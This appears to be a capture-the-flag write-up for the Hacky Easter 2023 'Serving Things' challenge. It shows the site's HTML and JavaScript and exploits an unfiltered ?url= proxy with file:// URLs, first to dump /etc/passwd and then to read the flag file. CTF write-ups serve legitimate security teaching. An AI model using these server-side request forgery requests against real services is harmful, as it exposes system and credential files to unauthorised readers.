Recently Updated
Serving Things
Challenge
Get the 🚩 at /flag.
http://ch.hackyeaster.com:2316
Note: The service is restarted every hour at x:00.
Solution
We get a simle website
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<!DOCTYPE html>
<html>
<head>
<title>Serving Things</title>
<link rel="stylesheet"
href="/static/app.css">
<script src="/static/jquery-3.6.3.min.js" language="javascript"></script>
<script src="/static/app.js" language="javascript"></script>
</head>
<body>
<div id="menu">
Get: <a id="quotes" href="#">Quotes</a> | <a id="colors" href="#">Colors</a> | <a id="stars" href="#">Stars</a> |
<a id="cheese" href="#">Cheese</a> | <a id="wine" href="#">Wine</a> | <a id="meals" href="#">Swiss Meals</a> |
<a id="trek" href="#">The Trek</a> | <a id="flag" href="#">Flag</a>
</div>
<div id="text">
</div>
<div id="footer">
<div id="created">
Created by inik / 2023
</div>
</div>
</body>
</html>
with app.js
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
function get(url) {
u = encodeURI(window.location.protocol + "//" + window.location.host + "/get?url=" + url);
$.get(u, function (data) {
var color = Math.floor(Math.random() * 16777215).toString(16);
$("#text").fadeOut(400);
setTimeout(function () {
$("#text").html(data);
$("#text").css("color", "#" + color);
$("#text").fadeIn(400);
}, 400);
});
}
$(document).ready(function () {
$("#quotes").click(function () {
get("http://quotes:1337/quote");
})
$("#colors").click(function () {
get("http://colors:1337/color");
})
$("#stars").click(function () {
get("http://stars:1337/star");
})
$("#cheese").click(function () {
get("http://cheese:1337/cheese");
})
$("#flag").click(function () {
get("http://flags:1337/flag");
})
$("#wine").click(function () {
get("http://wine:1337/wine");
})
$("#meals").click(function () {
get("http://meals:1337/meal");
})
$("#trek").click(function () {
get("http://trek:1337/trek");
})
$('#quotes').trigger('click');
});
So there are a couple of words you can click on, which get
1
http://ch.hackyeaster.com:2316/get?url=http://flags:1337/flag
returns
1
Thank you hacker! But our flag is in another castle! ~ Bugs Bunny
hmm..
Let’s see what else it will serve us
1
http://ch.hackyeaster.com:2316/get?url=file:///etc/passwd
gives us the /etc/passwd
file contents!
1
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
ok, so now we just need to figure out where our flag
file is..
After overthinking for a while, thinking /flag
referred to the location on the web and trying to find the web server config, we realize its just literally at /flag
on the file system, and get our flag by going to http://ch.hackyeaster.com:2316/get?url=file:///flag
, whoo!
Flag
he2023{4ls0-53rv3r-c4n-b3-1nj3ct3d!!!}